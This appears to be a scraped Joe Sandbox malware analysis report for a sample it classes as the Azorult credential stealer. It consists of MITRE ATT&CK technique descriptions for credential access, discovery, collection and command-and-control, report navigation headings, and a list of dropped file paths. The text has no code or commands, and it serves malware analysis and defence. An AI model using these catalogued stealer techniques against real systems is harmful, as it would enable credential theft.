Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jd4t3R7hOq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\4204906443976354681473.tmp

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-debug-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l2-1-0.dll

Windows Analysis Report
jd4t3R7hOq.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre